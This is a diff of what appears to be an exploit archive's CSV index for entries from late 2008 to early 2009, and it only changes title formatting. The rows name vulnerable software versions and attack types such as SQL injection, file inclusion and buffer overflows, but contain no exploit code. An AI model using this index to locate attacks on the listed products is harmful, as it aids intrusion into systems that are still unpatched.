(Auth Bypass) SQL Injection Vulnerability",2008-12-29,x0r,php,webapps,0 7615,platforms/php/webapps/7615.txt,"Flexphpsite 0.0.1 (Auth Bypass) SQL Injection Vulnerability",2008-12-29,x0r,php,webapps,0 @@ -7165,7 +7165,7 @@ id,file,description,date,author,platform,type,port 7625,platforms/php/webapps/7625.txt,"CMScout 2.06 SQL Injection/Local File Inclusion Vulnerabilities",2008-12-30,SirGod,php,webapps,0 7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script (editid1) Blind SQL Injection",2008-12-30,x0r,php,webapps,0 7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 Remote SQL Injection Vulnerability",2008-12-30,AlpHaNiX,asp,webapps,0 -7628,platforms/php/webapps/7628.txt,"ViArt Shopping Cart 3.5 Multiple Remote Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0 +7628,platforms/php/webapps/7628.txt,"viart shopping cart 3.5 Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0 7629,platforms/php/webapps/7629.txt,"DDL-Speed Script (acp/backup) Admin Backup Bypass Vulnerability",2009-01-01,tmh,php,webapps,0 7630,platforms/windows/remote/7630.html,"Megacubo 5.0.7 (mega://) Remote File Download and Execute Exploit",2009-01-01,JJunior,windows,remote,0 7631,platforms/php/webapps/7631.txt,"2Capsule (sticker.php id) Remote SQL Injection Vulnerability",2009-01-01,Zenith,php,webapps,0 @@ -7185,7 +7185,7 @@ id,file,description,date,author,platform,type,port 7645,platforms/php/webapps/7645.txt,"Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability",2009-01-02,ZoRLu,php,webapps,0 7646,platforms/multiple/local/7646.txt,"PHP <= 5.2.8 gd library - imageRotate() Information Leak Vulnerability",2009-01-02,"Hamid Ebadi",multiple,local,0 7647,platforms/multiple/dos/7647.txt,"VMware <= 2.5.1 (Vmware-authd) Remote Denial of Service Exploit",2009-01-02,"laurent gaffiĂ© ",multiple,dos,0 -7648,platforms/php/webapps/7648.txt,"phpSkelSite 1.4 (RFI/LFI/XSS) Multiple Remote Vulnerabilities",2009-01-02,ahmadbady,php,webapps,0 +7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 (rfi/lfi/xss) Multiple Vulnerabilities",2009-01-02,ahmadbady,php,webapps,0 7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 (.m3u File) Local Buffer Overflow PoC",2009-01-02,"aBo MoHaMeD",windows,dos,0 7650,platforms/php/webapps/7650.php,"Lito Lite CMS Multiple Cross Site Scripting / Blind SQL Injection Exploit",2009-01-03,darkjoker,php,webapps,0 7651,platforms/windows/local/7651.py,"Destiny Media Player 1.61 (.m3u File) Local Stack Overflow Exploit",2009-01-03,His0k4,windows,local,0 @@ -7208,8 +7208,8 @@ id,file,description,date,author,platform,type,port 7668,platforms/php/webapps/7668.pl,"Cybershade CMS 0.2b (index.php) Remote File Inclusion Exploit",2009-01-05,JosS,php,webapps,0 7669,platforms/php/webapps/7669.pl,"Joomla com_na_newsdescription (newsid) SQL Injection Exploit",2009-01-05,EcHoLL,php,webapps,0 7670,platforms/php/webapps/7670.pl,"Joomla com_phocadocumentation (id) Remote SQL Injection Exploit",2009-01-05,EcHoLL,php,webapps,0 -7671,platforms/windows/local/7671.pl,"VUPlayer 2.49 (.wax File) Local Buffer Overflow Exploit",2009-01-05,Houssamix,windows,local,0 -7672,platforms/php/webapps/7672.txt,"PHPAuctionSystem (XSS/SQL) Multiple Remote Vulnerabilities",2009-01-05,x0r,php,webapps,0 +7671,platforms/windows/local/7671.pl,"VUPlayer 2.49 - (.wax File) Local Buffer Overflow Exploit",2009-01-05,Houssamix,windows,local,0 +7672,platforms/php/webapps/7672.txt,"phpauctionsystem (xss/sql) Multiple Vulnerabilities",2009-01-05,x0r,php,webapps,0 7673,platforms/multiple/dos/7673.html,"Safari (Arguments) Array Integer Overflow PoC (New Heap Spray)",2009-01-05,SkyLined,multiple,dos,0 7674,platforms/php/webapps/7674.txt,"PHPAuctionSystem Insecure Cookie Handling Vulnerability",2009-01-05,ZoRLu,php,webapps,0 7675,platforms/multiple/local/7675.txt,"Oracle 10g SYS.LT.REMOVEWORKSPACE SQL Injection Exploit",2009-01-06,Sh2kerr,multiple,local,0 @@ -7217,7 +7217,7 @@ id,file,description,date,author,platform,type,port 7677,platforms/multiple/local/7677.txt,"Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit",2009-01-06,Sh2kerr,multiple,local,0 7678,platforms/php/webapps/7678.txt,"PHPAuctionSystem Multiple Remote File Inclusion Vulnerabilities",2009-01-06,darkmasking,php,webapps,0 7679,platforms/php/webapps/7679.php,"RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit",2009-01-06,cOndemned,php,webapps,0 -7680,platforms/php/webapps/7680.txt,"ezPack 4.2b2 (XSS/SQL) Multiple Remote Vulnerabilities",2009-01-06,!-BUGJACK-!,php,webapps,0 +7680,platforms/php/webapps/7680.txt,"ezpack 4.2b2 (xss/sql) Multiple Vulnerabilities",2009-01-06,!-BUGJACK-!,php,webapps,0 7681,platforms/linux/local/7681.txt,"Debian GNU/Linux XTERM (DECRQSS/comments) Weakness Vulnerability",2009-01-06,"Paul Szabo",linux,local,0 7682,platforms/php/webapps/7682.txt,"RiotPix <= 0.61 (Auth Bypass) SQL Injection Vulnerability",2009-01-06,ZoRLu,php,webapps,0 7683,platforms/php/webapps/7683.pl,"Goople <= 1.8.2 (frontpage.php) Blind SQL Injection Exploit",2009-01-06,darkjoker,php,webapps,0 @@ -7246,13 +7246,13 @@ id,file,description,date,author,platform,type,port 7706,platforms/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext <= 1.2.0-RC1 mIRC script",2009-01-08,Phil,windows,remote,0 7707,platforms/windows/local/7707.py,"IntelliTamper (2.07/2.08) Language Catalog SEH Overflow Exploit",2009-01-08,Cnaph,windows,local,0 7708,platforms/windows/dos/7708.pl,"MP3 TrackMaker 1.5 (.mp3 File) Local Heap Overflow PoC",2009-01-09,Houssamix,windows,dos,0 -7709,platforms/windows/dos/7709.pl,"VUPlayer 2.49 .ASX File (HREF) Local Buffer Overflow PoC",2009-01-09,"aBo MoHaMeD",windows,dos,0 +7709,platforms/windows/dos/7709.pl,"VUPlayer 2.49 - .ASX File (HREF) Local Buffer Overflow PoC",2009-01-09,"aBo MoHaMeD",windows,dos,0 7710,platforms/windows/dos/7710.html,"MS Internet Explorer JavaScript screen[ ] Denial of Service Exploit",2009-01-09,SkyLined,windows,dos,0 7711,platforms/php/webapps/7711.txt,"Fast FAQs System (Auth Bypass) SQL Injection Vulnerability",2009-01-09,x0r,php,webapps,0 7712,platforms/hardware/remote/7712.txt,"Netgear WG102 Leaks SNMP write password with read access",2009-01-09,"Harm S.I. Vaittes",hardware,remote,0 -7713,platforms/windows/local/7713.pl,"VUPlayer 2.49 .ASX File (HREF) Local Buffer Overflow Exploit",2009-01-09,Houssamix,windows,local,0 -7714,platforms/windows/local/7714.pl,"VUPlayer 2.49 .ASX File (HREF) Local Buffer Overflow Exploit",2009-01-11,sCORPINo,windows,local,0 -7715,platforms/windows/local/7715.py,"VUPlayer 2.49 .ASX File (HREF) Universal Buffer Overflow Exploit",2009-01-11,His0k4,windows,local,0 +7713,platforms/windows/local/7713.pl,"VUPlayer 2.49 - .ASX File (HREF) Local Buffer Overflow Exploit (2)",2009-01-09,Houssamix,windows,local,0 +7714,platforms/windows/local/7714.pl,"VUPlayer 2.49 - .ASX File (HREF) Local Buffer Overflow Exploit (1)",2009-01-11,sCORPINo,windows,local,0 +7715,platforms/windows/local/7715.py,"VUPlayer 2.49 - .ASX File (HREF) Universal Buffer Overflow Exploit",2009-01-11,His0k4,windows,local,0 7716,platforms/php/webapps/7716.pl,"Joomla com_xevidmegahd (catid) Remote SQL Injection Exploit",2009-01-11,EcHoLL,php,webapps,0 7717,platforms/php/webapps/7717.pl,"Joomla com_jashowcase (catid) Remote SQL Injection Exploit",2009-01-11,EcHoLL,php,webapps,0 7718,platforms/php/webapps/7718.txt,"Joomla com_newsflash (id) Remote SQL Injection Vulnerability",2009-01-11,EcHoLL,php,webapps,0 @@ -7282,7 +7282,7 @@ id,file,description,date,author,platform,type,port 7742,platforms/windows/dos/7742.txt,"Winamp <= 5.541 (mp3/aiff) Multiple Denial of Service Exploits",2009-01-12,securfrog,windows,dos,0 7743,platforms/php/webapps/7743.txt,"Realtor 747 (define.php INC_DIR) Remote File Inclusion Vulnerability",2009-01-12,ahmadbady,php,webapps,0 7744,platforms/asp/webapps/7744.txt,"Virtual GuestBook 2.1 Remote Database Disclosure Vulnerability",2009-01-13,Moudi,asp,webapps,0 -7745,platforms/windows/local/7745.py,"VUPlayer 2.49 .ASX File (Universal) Local Buffer Overflow Exploit",2009-01-13,Encrypt3d.M!nd,windows,local,0 +7745,platforms/windows/local/7745.py,"VUPlayer 2.49 - .ASX File (Universal) Local Buffer Overflow Exploit",2009-01-13,Encrypt3d.M!nd,windows,local,0 7746,platforms/php/webapps/7746.txt,"Joomla Component com_gigcal (gigcal_gigs_id) SQL Injection Vuln",2009-01-13,boom3rang,php,webapps,0 7747,platforms/windows/remote/7747.html,"Word Viewer OCX 3.2 ActiveX (Save) Remote File Overwrite Exploit",2009-01-13,Houssamix,windows,remote,0 7748,platforms/windows/remote/7748.html,"Office Viewer ActiveX Control 3.0.1 (Save) Remote File Overwrite Exploit",2009-01-13,Houssamix,windows,remote,0 @@ -7295,10 +7295,10 @@ id,file,description,date,author,platform,type,port 7755,platforms/windows/remote/7755.html,"PowerPoint Viewer OCX 3.1 Remote File Execution Exploit",2009-01-13,Cyber-Zone,windows,remote,0 7756,platforms/windows/dos/7756.py,"Nofeel FTP Server 3.6 (CWD) Remote Memory Consumption Exploit",2009-01-13,His0k4,windows,dos,0 7757,platforms/windows/remote/7757.html,"Word Viewer OCX 3.2 Remote File Execution exploit",2009-01-13,Stack,windows,remote,0 -7758,platforms/php/webapps/7758.txt,"Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability",2009-01-13,darkjoker,php,webapps,0 +7758,platforms/php/webapps/7758.txt,"Dark Age CMS <= 0.2c Beta - (Auth Bypass) SQL Injection Vulnerability",2009-01-13,darkjoker,php,webapps,0 7759,platforms/php/webapps/7759.txt,"Syzygy CMS <= 0.3 (Auth Bypass) SQL Injection Vulnerability",2009-01-14,darkjoker,php,webapps,0 7760,platforms/multiple/remote/7760.php,"TeamSpeak <= 2.0.23.17 Remote File Disclosure Vulnerability",2009-01-14,c411k,multiple,remote,0 -7761,platforms/asp/webapps/7761.txt,"Netvolution CMS 1.0 (XSS/SQL) Multiple Remote Vulnerabilities",2009-01-14,Ellinas,asp,webapps,0 +7761,platforms/asp/webapps/7761.txt,"netvolution cms 1.0 (xss/sql) Multiple Vulnerabilities",2009-01-14,Ellinas,asp,webapps,0 7762,platforms/windows/remote/7762.html,"EDraw Office Viewer 5.4 HttpDownloadFile() Insecure Method Vuln",2009-01-14,Cyber-Zone,windows,remote,0 7763,platforms/windows/remote/7763.html,"Excel Viewer OCX 3.2 Remote File Execution Exploit",2009-01-14,Stack,windows,remote,0 7764,platforms/php/webapps/7764.txt,"DMXReady Blog Manager <= 1.1 Remote File Delete Vulnerability",2009-01-14,ajann,php,webapps,0 @@ -7327,13 +7327,13 @@ id,file,description,date,author,platform,type,port 7787,platforms/php/webapps/7787.txt,"DMXReady Secure Document Library <= 1.1 Remote SQL Injection Vuln",2009-01-14,ajann,php,webapps,0 7788,platforms/asp/webapps/7788.txt,"DMXReady BillboardManager <= 1.1 Contents Change Vulnerability",2009-01-14,x0r,asp,webapps,0 7789,platforms/asp/webapps/7789.txt,"DMXReady SDK <= 1.1 Remote File Download Vulnerability",2009-01-14,ajann,asp,webapps,0 -7790,platforms/windows/dos/7790.txt,"NetSurf Web Browser 1.2 Multiple Remote Vulnerabilities",2009-01-14,"Jeremy Brown",windows,dos,0 +7790,platforms/windows/dos/7790.txt,"netsurf web browser 1.2 Multiple Vulnerabilities",2009-01-14,"Jeremy Brown",windows,dos,0 7791,platforms/asp/webapps/7791.txt,"DMXReady Billboard Manager <= 1.1 Remote File Upload Vulnerability",2009-01-15,ajann,asp,webapps,0 7792,platforms/php/webapps/7792.txt,"GNUBoard 4.31.03 (08.12.29) Local File Inclusion Vulnerability",2009-01-15,flyh4t,php,webapps,0 7793,platforms/php/webapps/7793.php,"Joomla com_Eventing 1.6.x Blind SQL Injection Exploit",2009-01-15,InjEctOr5,php,webapps,0 7794,platforms/windows/remote/7794.html,"Ciansoft PDFBuilderX 2.2 ActiveX Arbitrary File Overwrite Exploit",2009-01-15,"Alfons Luja",windows,remote,0 7795,platforms/php/webapps/7795.txt,"Joomla Component RD-Autos 1.5.5 (id) SQL Injection Vulnerability",2009-01-15,H!tm@N,php,webapps,0 -7796,platforms/php/webapps/7796.txt,"MKPortal <= 1.2.1 () Multiple Remote Vulnerabilities",2009-01-15,waraxe,php,webapps,0 +7796,platforms/php/webapps/7796.txt,"mkportal <= 1.2.1 () Multiple Vulnerabilities",2009-01-15,waraxe,php,webapps,0 7797,platforms/php/webapps/7797.php,"Blue Eye CMS <= 1.0.0 (clanek) Blind SQL Injection Exploit",2009-01-15,darkjoker,php,webapps,0 7798,platforms/php/webapps/7798.txt,"Free Bible Search PHP Script (readbible.php) SQL Injection Vulnerability",2009-01-15,nuclear,php,webapps,0 7799,platforms/windows/dos/7799.pl,"Novell Netware 6.5 (ICEbrowser) Remote System DoS Exploit",2009-01-16,"Jeremy Brown",windows,dos,0 @@ -7341,9 +7341,9 @@ id,file,description,date,author,platform,type,port 7801,platforms/asp/webapps/7801.txt,"eReservations (Auth Bypass) SQL Injection Vulnerability",2009-01-16,ByALBAYX,asp,webapps,0 7802,platforms/asp/webapps/7802.txt,"The Walking Club (Auth Bypass) SQL Injection Vulnerability",2009-01-16,ByALBAYX,asp,webapps,0 7803,platforms/asp/webapps/7803.txt,"Ping IP (Auth Bypass) SQL Injection Vulnerability",2009-01-16,ByALBAYX,asp,webapps,0 -7804,platforms/windows/remote/7804.html,"MetaProducts MetaTreeX V 1.5.100 ActiveX File Overwrite Exploit",2009-01-16,Houssamix,windows,remote,0 -7805,platforms/php/webapps/7805.txt,"RankEm (DD/XSS/CM) Multiple Remote Vulnerabilities",2009-01-16,Pouya_Server,php,webapps,0 -7806,platforms/php/webapps/7806.txt,"BlogIt! (SQL/DD/XSS) Multiple Remote Vulnerabilities",2009-01-16,Pouya_Server,php,webapps,0 +7804,platforms/windows/remote/7804.html,"MetaProducts MetaTreeX 1.5.100 - ActiveX File Overwrite Exploit",2009-01-16,Houssamix,windows,remote,0 +7805,platforms/php/webapps/7805.txt,"rankem (dd/xss/cm) Multiple Vulnerabilities",2009-01-16,Pouya_Server,php,webapps,0 +7806,platforms/php/webapps/7806.txt,"blogit! (sql/dd/xss) Multiple Vulnerabilities",2009-01-16,Pouya_Server,php,webapps,0 7807,platforms/asp/webapps/7807.txt,"ASP ActionCalendar 1.3 (Auth Bypass) SQL Injection Vulnerability",2009-01-16,SuB-ZeRo,asp,webapps,0 7809,platforms/php/webapps/7809.txt,"Aj Classifieds - Real Estate 3.0 - Remote Shell Upload Vulnerability",2009-01-16,ZoRLu,php,webapps,0 7810,platforms/php/webapps/7810.txt,"Aj Classifieds - Personals 3.0 - Remote Shell Upload Vulnerability",2009-01-16,ZoRLu,php,webapps,0 @@ -7361,13 +7361,13 @@ id,file,description,date,author,platform,type,port 7822,platforms/multiple/dos/7822.c,"D-Bus Daemon < 1.2.4 (libdbus) Denial of Service Exploit",2009-01-19,"Jon Oberheide",multiple,dos,0 7823,platforms/qnx/dos/7823.txt,"QNX 6.4.0 bitflipped elf binary (id) Kernel Panic Exploit",2009-01-19,kokanin,qnx,dos,0 7824,platforms/php/webapps/7824.pl,"Joomla com_pccookbook (recipe_id) Blind SQL Injection Exploit",2009-01-19,InjEctOr5,php,webapps,0 -7826,platforms/windows/remote/7826.html,"SmartVmd ActiveX v 1.1 Remote File Overwrite Exploit",2009-01-19,Houssamix,windows,remote,0 -7827,platforms/windows/remote/7827.html,"SmartVmd ActiveX v 1.1 Remote File Deletion Exploit",2009-01-19,Houssamix,windows,remote,0 +7826,platforms/windows/remote/7826.html,"SmartVmd ActiveX 1.1 - Remote File Overwrite Exploit",2009-01-19,Houssamix,windows,remote,0 +7827,platforms/windows/remote/7827.html,"SmartVmd ActiveX 1.1 - Remote File Deletion Exploit",2009-01-19,Houssamix,windows,remote,0 7828,platforms/php/webapps/7828.txt,"Joomla Component com_news SQL Injection Vulnerability",2009-01-19,Snakespc,php,webapps,0 7829,platforms/php/webapps/7829.txt,"Gallery Kys 1.0 Admin Password Disclosure / Permanent XSS Vulns",2009-01-19,Osirys,php,webapps,0 7830,platforms/php/webapps/7830.txt,"RCBlog 1.03 - Authentication Bypass Vulnerability",2009-01-19,"Danny Moules",php,webapps,0 7831,platforms/php/webapps/7831.txt,"Ninja Blog 4.8 Remote Information Disclosure Vulnerability",2009-01-19,"Danny Moules",php,webapps,0 -7832,platforms/php/webapps/7832.txt,"PHPAds 2.0 Multiple Remote Vulnerabilities",2009-01-19,"Danny Moules",php,webapps,0 +7832,platforms/php/webapps/7832.txt,"phpads 2.0 Multiple Vulnerabilities",2009-01-19,"Danny Moules",php,webapps,0 7833,platforms/php/webapps/7833.php,"Joomla com_waticketsystem Blind SQL Injection Exploit",2009-01-19,InjEctOr5,php,webapps,0 7834,platforms/php/webapps/7834.txt,"Ninja Blog 4.8 (CSRF/HTML Injection) Vulnerability",2009-01-19,"Danny Moules",php,webapps,0 7835,platforms/php/webapps/7835.htm,"Max.Blog 1.0.6 Arbitrary Delete Post Exploit",2009-01-20,SirGod,php,webapps,0 @@ -7386,7 +7386,7 @@ id,file,description,date,author,platform,type,port 7848,platforms/windows/local/7848.pl,"Browser3D 3.5 (.sfs File) Local Stack Overflow Exploit",2009-01-22,AlpHaNiX,windows,local,0 7849,platforms/php/webapps/7849.txt,"OwnRS Blog 1.2 (autor.php) SQL Injection Vulnerability",2009-01-22,nuclear,php,webapps,0 7850,platforms/asp/webapps/7850.txt,"asp-project 1.0 Insecure Cookie Method Vulnerability",2009-01-22,IRCRASH,asp,webapps,0 -7851,platforms/php/webapps/7851.php,"Pardal CMS <= 0.2.0 Blind SQL Injection Exploit",2009-01-22,darkjoker,php,webapps,0 +7851,platforms/php/webapps/7851.php,"Pardal CMS <= 0.2.0 - Blind SQL Injection Exploit",2009-01-22,darkjoker,php,webapps,0 7852,platforms/windows/dos/7852.pl,"FTPShell Server 4.3 (licence key) Remote Buffer Overflow PoC",2009-01-22,LiquidWorm,windows,dos,0 7853,platforms/windows/local/7853.pl,"EleCard MPEG PLAYER (.m3u file) Local Stack Overflow Exploit",2009-01-25,AlpHaNiX,windows,local,0 7854,platforms/windows/dos/7854.pl,"MediaMonkey 3.0.6 (.m3u file) Local Buffer Overflow PoC",2009-01-25,AlpHaNiX,windows,dos,0 @@ -7395,12 +7395,12 @@ id,file,description,date,author,platform,type,port 7857,platforms/windows/dos/7857.pl,"Merak Media Player 3.2 m3u file Local Buffer Overflow PoC",2009-01-25,Houssamix,windows,dos,0 7858,platforms/hardware/remote/7858.php,"Siemens ADSL SL2-141 CSRF Exploit",2009-01-25,spdr,hardware,remote,0 7859,platforms/php/webapps/7859.pl,"MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit",2009-01-25,StAkeR,php,webapps,0 -7860,platforms/php/webapps/7860.php,"Mambo com_sim v0.8 Blind SQL Injection Exploit",2009-01-25,"Mehmet Ince",php,webapps,0 +7860,platforms/php/webapps/7860.php,"Mambo com_sim 0.8 - Blind SQL Injection Exploit",2009-01-25,"Mehmet Ince",php,webapps,0 7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 (Auth Bypass) SQL Injection Vulnerability",2009-01-25,ByALBAYX,asp,webapps,0 7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 (cat_id) SQL Injection Vulnerability",2009-01-25,JiKo,php,webapps,0 7863,platforms/php/webapps/7863.txt,"OpenGoo 1.1 (script_class) Local File Inclusion Vulnerability",2009-01-25,fuzion,php,webapps,0 7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 (password.dat) Disclosure Exploit",2009-01-25,Pouya_Server,php,webapps,0 -7865,platforms/solaris/dos/7865.c,"SunOS Release 5.11 Version snv_101b Remote IPv6 Crash Exploit",2009-01-26,Kingcope,solaris,dos,0 +7865,platforms/solaris/dos/7865.c,"SunOS Release 5.11 snv_101b - Remote IPv6 Crash Exploit",2009-01-26,Kingcope,solaris,dos,0 7866,platforms/php/webapps/7866.txt,"Simple Machines Forum <= 1.1.7 - CSRF/XSS/Package Upload",2009-01-26,Xianur0,php,webapps,0 7867,platforms/php/webapps/7867.php,"ITLPoll 2.7 Stable2 (index.php id) Blind SQL Injection Exploit",2009-01-26,fuzion,php,webapps,0 7868,platforms/windows/remote/7868.html,"FlexCell Grid Control 5.6.9 Remote File Overwrite Exploit",2009-01-26,Houssamix,windows,remote,0 @@ -7416,7 +7416,7 @@ id,file,description,date,author,platform,type,port 7879,platforms/php/webapps/7879.pl,"SiteXS <= 0.1.1 (type) Local File Inclusion Exploit",2009-01-26,darkjoker,php,webapps,0 7880,platforms/php/webapps/7880.txt,"ClickAuction (Auth Bypass) Remote SQL Injection Vulnerability",2009-01-26,R3d-D3v!L,php,webapps,0 7881,platforms/php/webapps/7881.txt,"Joomla com_flashmagazinedeluxe (mag_id) SQL Injection Vulnerability",2009-01-26,TurkGuvenligi,php,webapps,0 -7882,platforms/windows/dos/7882.html,"NCTVideoStudio ActiveX DLLs Version 1.6 Remote Heap Overflow PoC",2009-01-26,Stack,windows,dos,0 +7882,platforms/windows/dos/7882.html,"NCTVideoStudio ActiveX DLLs 1.6 - Remote Heap Overflow PoC",2009-01-26,Stack,windows,dos,0 7883,platforms/php/webapps/7883.txt,"OpenX 2.6.3 (MAX_type) Local File Inclusion Vulnerability",2009-01-26,"Charlie Briggs",php,webapps,0 7884,platforms/php/webapps/7884.txt,"Flax Article Manager 1.1 Remote PHP Script Upload Vulnerability",2009-01-27,S.W.A.T.,php,webapps,0 7885,platforms/php/webapps/7885.txt,"Max.Blog <= 1.0.6 (show_post.php) SQL Injection Vulnerability",2009-01-27,"Salvatore Fresta",php,webapps,0 @@ -7426,7 +7426,7 @@ id,file,description,date,author,platform,type,port 7889,platforms/windows/dos/7889.pl,"Zinf Audio Player 2.2.1 (M3U FILE) Local Heap Overflow PoC",2009-01-27,Hakxer,windows,dos,0 7890,platforms/windows/dos/7890.pl,"Zinf Audio Player 2.2.1 (gqmpeg File) Buffer Overflow PoC",2009-01-27,Hakxer,windows,dos,0 7892,platforms/php/webapps/7892.php,"Community CMS <= 0.4 (/index.php id) Blind SQL Injection Exploit",2009-01-28,darkjoker,php,webapps,0 -7893,platforms/php/webapps/7893.txt,"GameScript 4.6 (XSS/SQL/LFI) Multiple Remote Vulnerabilities",2009-01-28,Encrypt3d.M!nd,php,webapps,0 +7893,platforms/php/webapps/7893.txt,"gamescript 4.6 (xss/sql/lfi) Multiple Vulnerabilities",2009-01-28,Encrypt3d.M!nd,php,webapps,0 7894,platforms/php/webapps/7894.txt,"Chipmunk Blog (Auth Bypass) Add Admin Exploit",2009-01-28,x0r,php,webapps,0 7895,platforms/php/webapps/7895.txt,"Gazelle CMS (template) Local File Inclusion Vulnerability",2009-01-28,fuzion,php,webapps,0 7896,platforms/php/webapps/7896.php,"Lore 1.5.6 (article.php) Blind SQL Injection Exploit",2009-01-28,OzX,php,webapps,0 @@ -7443,7 +7443,7 @@ id,file,description,date,author,platform,type,port 7908,platforms/php/webapps/7908.txt,"Star Articles 6.0 (admin.manage) Remote Contents Change Vulnerability",2009-01-29,ByALBAYX,php,webapps,0 7909,platforms/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 Remote PHP File Upload Vulnerability",2009-01-29,"Michael Brooks",php,webapps,0 7910,platforms/windows/remote/7910.html,"WOW - Web On Windows ActiveX Control 2 Remote Code Execution",2009-01-29,"Michael Brooks",windows,remote,0 -7911,platforms/php/webapps/7911.txt,"GLPI v 0.71.3 Multiple Remote SQL Injection VUlnerabilities",2009-01-29,Zigma,php,webapps,0 +7911,platforms/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple Remote SQL Injection VUlnerabilities",2009-01-29,Zigma,php,webapps,0 7912,platforms/windows/remote/7912.txt,"Internet Explorer 7 ClickJacking Vulnerability (2009-01-23)",2009-01-29,UzmiX,windows,remote,0 7913,platforms/windows/remote/7913.pl,"WFTPD Explorer Pro 1.0 Remote Heap Overflow Exploit",2009-01-29,SkD,windows,remote,21 7915,platforms/hardware/remote/7915.txt,"Motorola Wimax modem CPEi300 (FD/XSS) Multiple Vulnerabilities",2009-01-29,"Usman Saeed",hardware,remote,0 @@ -7456,18 +7456,18 @@ id,file,description,date,author,platform,type,port 7922,platforms/php/webapps/7922.txt,"Pligg 9.9.5 - CSRF Protection Bypass and Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0 7923,platforms/windows/local/7923.c,"Total Video Player 1.3.7 (.m3u) Local Buffer Overflow Exploit",2009-01-29,SimO-s0fT,windows,local,0 7924,platforms/asp/webapps/7924.txt,"SalesCart (Auth Bypass) SQL Injection Vulnerability",2009-01-30,ByALBAYX,asp,webapps,0 -7925,platforms/php/webapps/7925.txt,"ReVou Twitter Clone (XSS/SQL) Multiple Remote Vulnerabilities",2009-01-30,nuclear,php,webapps,0 +7925,platforms/php/webapps/7925.txt,"revou twitter clone (xss/sql) Multiple Vulnerabilities",2009-01-30,nuclear,php,webapps,0 7926,platforms/windows/remote/7926.pl,"Amaya Web Editor 11 Remote SEH Overwrite Exploit",2009-01-30,LiquidWorm,windows,remote,0 -7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 (09.01.30) Multiple Local/Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0 +7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 (09.01.30) Multiple Local/Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0 7928,platforms/windows/remote/7928.txt,"Synactis All_IN_THE_BOX ActiveX 3.0 - Null byte File Overwrite Vuln",2009-01-30,DSecRG,windows,remote,0 7929,platforms/windows/local/7929.c,"GOM Player 2.0.12 (.PLS) Universal Buffer Overflow Exploit",2009-01-30,Stack,windows,local,0 -7930,platforms/php/webapps/7930.txt,"BPAutoSales 1.0.1 (XSS/SQL) Multiple Remote Vulnerabilities",2009-01-30,"Mehmet Ince",php,webapps,0 +7930,platforms/php/webapps/7930.txt,"bpautosales 1.0.1 (xss/sql) Multiple Vulnerabilities",2009-01-30,"Mehmet Ince",php,webapps,0 7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 (Topic) Remote XSS Vulnerability",2009-01-30,J-Hacker,php,webapps,0 7932,platforms/php/webapps/7932.txt,"SkaLinks 1.5 (Auth Bypass) SQL Injection Vulnerability",2009-01-30,Dimi4,php,webapps,0 7933,platforms/php/webapps/7933.txt,"eVision CMS <= 2.0 (field) SQL Injection Vulnerability",2009-01-30,darkjoker,php,webapps,0 7934,platforms/windows/dos/7934.py,"Spider Player 2.3.9.5 (asx File) off by one Crash Exploit",2009-01-30,Houssamix,windows,dos,0 7935,platforms/windows/remote/7935.html,"Google Chrome 1.0.154.46 (ChromeHTML://) Parameter Injection PoC",2009-01-30,waraxe,windows,remote,0 -7936,platforms/php/webapps/7936.txt,"SMA-DB 0.3.12 (RFI/XSS) Multiple Remote Vulnerabilities",2009-02-02,ahmadbady,php,webapps,0 +7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 (rfi/xss) Multiple Vulnerabilities",2009-02-02,ahmadbady,php,webapps,0 7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 (Job fields) XSS/Iframe Injection PoC",2009-02-02,"Alfons Luja",php,webapps,0 7939,platforms/php/webapps/7939.txt,"AJA Portal 1.2 Local File Inclusion Vulnerabilities (win)",2009-02-02,ahmadbady,php,webapps,0 7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support (Auth Bypass) SQL Injection Vuln",2009-02-02,ByALBAYX,php,webapps,0 @@ -7476,15 +7476,15 @@ id,file,description,date,author,platform,type,port 7943,platforms/windows/dos/7943.py,"RealVNC 4.1.2 (vncviewer.exe) RFB Protocol Remote Code Execution PoC",2009-02-02,"Andres Luksenberg",windows,dos,0 7944,platforms/php/webapps/7944.php,"phpBLASTER 1.0 RC1 (blaster_user) Blind SQL Injection Exploit",2009-02-02,darkjoker,php,webapps,0 7945,platforms/php/webapps/7945.php,"CMS Mini <= 0.2.2 Remote Command Execution Exploit",2009-02-02,darkjoker,php,webapps,0 -7946,platforms/php/webapps/7946.txt,"sourdough 0.3.5 Remote File Inclusion Vulnerability",2009-02-02,ahmadbady,php,webapps,0 +7946,platforms/php/webapps/7946.txt,"sourdough 0.3.5 - Remote File Inclusion Vulnerability",2009-02-02,ahmadbady,php,webapps,0 7947,platforms/php/webapps/7947.pl,"eVision CMS 2.0 Remote Code Execution Exploit",2009-02-02,Osirys,php,webapps,0 7948,platforms/php/webapps/7948.php,"phpslash <= 0.8.1.1 Remote Code Execution Exploit",2009-02-02,DarkFig,php,webapps,0 7949,platforms/php/webapps/7949.rb,"OpenHelpDesk 1.0.100 eval() Code Execution Exploit (meta)",2009-02-02,LSO,php,webapps,0 7951,platforms/php/webapps/7951.txt,"WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability",2009-02-03,Stack,php,webapps,0 